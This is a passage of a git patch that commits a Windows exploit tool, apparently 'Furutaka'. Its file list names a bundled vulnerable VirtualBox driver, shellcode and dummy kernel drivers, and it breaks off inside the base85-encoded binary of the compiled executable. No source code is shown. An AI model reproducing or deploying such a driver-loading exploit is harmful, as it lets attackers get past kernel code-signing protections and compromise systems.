From 20a4e9b2102a5978673178303fb3babf9790626d Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Thu, 4 Feb 2016 11:42:05 +0700 Subject: [PATCH] v 1.0.0 Initial commit --- Compiled/Furutaka.exe | Bin 0 -> 97792 bytes Compiled/dummy.sys | Bin 0 -> 2560 bytes Compiled/dummy2.sys | Bin 0 -> 4096 bytes README.md | 40 + Source/DummyDrv/dummy.sln | 20 + Source/DummyDrv/dummy/dummy.vcxproj | 239 + Source/DummyDrv/dummy/dummy.vcxproj.filters | 26 + Source/DummyDrv/dummy/dummy.vcxproj.user | 6 + Source/DummyDrv/dummy/main.c | 63 + Source/DummyDrv2/dummy.sln | 20 + Source/DummyDrv2/dummy/dummy.vcxproj | 242 + Source/DummyDrv2/dummy/dummy.vcxproj.filters | 31 + Source/DummyDrv2/dummy/dummy.vcxproj.user | 6 + Source/DummyDrv2/dummy/main.c | 296 ++ Source/DummyDrv2/dummy/main.h | 112 + Source/DummyDrv2/dummy/r3request.c | 34 + Source/Furutaka/Furutaka.sln | 22 + Source/Furutaka/Furutaka.vcxproj | 217 + Source/Furutaka/Furutaka.vcxproj.filters | 110 + Source/Furutaka/Furutaka.vcxproj.user | 19 + Source/Furutaka/cui.c | 64 + Source/Furutaka/cui.h | 28 + Source/Furutaka/drv/vboxdrv_exploitable.sys | Bin 0 -> 68288 bytes Source/Furutaka/global.h | 50 + Source/Furutaka/instdrv.c | 265 + Source/Furutaka/instdrv.h | 54 + Source/Furutaka/main.c | 838 +++ Source/Furutaka/minirtl/_strcat.c | 37 + Source/Furutaka/minirtl/_strcmpi.c | 47 + Source/Furutaka/minirtl/_strcpy.c | 43 + Source/Furutaka/minirtl/_strend.c | 23 + Source/Furutaka/minirtl/_strlen.c | 27 + Source/Furutaka/minirtl/_strncmpi.c | 55 + Source/Furutaka/minirtl/cmdline.c | 180 + Source/Furutaka/minirtl/cmdline.h | 35 + Source/Furutaka/minirtl/minirtl.h | 155 + Source/Furutaka/minirtl/rtltypes.h | 43 + Source/Furutaka/minirtl/u64tohex.c | 49 + Source/Furutaka/minirtl/u64tostr.c | 45 + Source/Furutaka/minirtl/ultohex.c | 49 + Source/Furutaka/minirtl/ultostr.c | 45 + Source/Furutaka/ntos.h | 4904 ++++++++++++++++++ Source/Furutaka/resource.h | Bin 0 -> 900 bytes Source/Furutaka/resource.rc | Bin 0 -> 4978 bytes Source/Furutaka/shellcode.h | 145 + Source/Furutaka/sup.c | 422 ++ Source/Furutaka/sup.h | 59 + Source/Furutaka/vbox.h | 226 + TDL.sha256 | 47 + 49 files changed, 9438 insertions(+) create mode 100644 Compiled/Furutaka.exe create mode 100644 Compiled/dummy.sys create mode 100644 Compiled/dummy2.sys create mode 100644 README.md create mode 100644 Source/DummyDrv/dummy.sln create mode 100644 Source/DummyDrv/dummy/dummy.vcxproj create mode 100644 Source/DummyDrv/dummy/dummy.vcxproj.filters create mode 100644 Source/DummyDrv/dummy/dummy.vcxproj.user create mode 100644 Source/DummyDrv/dummy/main.c create mode 100644 Source/DummyDrv2/dummy.sln create mode 100644 Source/DummyDrv2/dummy/dummy.vcxproj create mode 100644 Source/DummyDrv2/dummy/dummy.vcxproj.filters create mode 100644 Source/DummyDrv2/dummy/dummy.vcxproj.user create mode 100644 Source/DummyDrv2/dummy/main.c create mode 100644 Source/DummyDrv2/dummy/main.h create mode 100644 Source/DummyDrv2/dummy/r3request.c create mode 100644 Source/Furutaka/Furutaka.sln create mode 100644 Source/Furutaka/Furutaka.vcxproj create mode 100644 Source/Furutaka/Furutaka.vcxproj.filters create mode 100644 Source/Furutaka/Furutaka.vcxproj.user create mode 100644 Source/Furutaka/cui.c create mode 100644 Source/Furutaka/cui.h create mode 100644 Source/Furutaka/drv/vboxdrv_exploitable.sys create mode 100644 Source/Furutaka/global.h create mode 100644 Source/Furutaka/instdrv.c create mode 100644 Source/Furutaka/instdrv.h create mode 100644 Source/Furutaka/main.c create mode 100644 Source/Furutaka/minirtl/_strcat.c create mode 100644 Source/Furutaka/minirtl/_strcmpi.c create mode 100644 Source/Furutaka/minirtl/_strcpy.c create mode 100644 Source/Furutaka/minirtl/_strend.c create mode 100644 Source/Furutaka/minirtl/_strlen.c create mode 100644 Source/Furutaka/minirtl/_strncmpi.c create mode 100644 Source/Furutaka/minirtl/cmdline.c create mode 100644 Source/Furutaka/minirtl/cmdline.h create mode 100644 Source/Furutaka/minirtl/minirtl.h create mode 100644 Source/Furutaka/minirtl/rtltypes.h create mode 100644 Source/Furutaka/minirtl/u64tohex.c create mode 100644 Source/Furutaka/minirtl/u64tostr.c create mode 100644 Source/Furutaka/minirtl/ultohex.c create mode 100644 Source/Furutaka/minirtl/ultostr.c create mode 100644 Source/Furutaka/ntos.h create mode 100644 Source/Furutaka/resource.h create mode 100644 Source/Furutaka/resource.rc create mode 100644 Source/Furutaka/shellcode.h create mode 100644 Source/Furutaka/sup.c create mode 100644 Source/Furutaka/sup.h create mode 100644 Source/Furutaka/vbox.h create mode 100644 TDL.sha256 diff --git a/Compiled/Furutaka.exe b/Compiled/Furutaka.exe new file mode 100644 index 0000000000000000000000000000000000000000..0c6dfa369f1f6602475a2c4984fb0a6527581328 GIT binary patch literal 97792 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 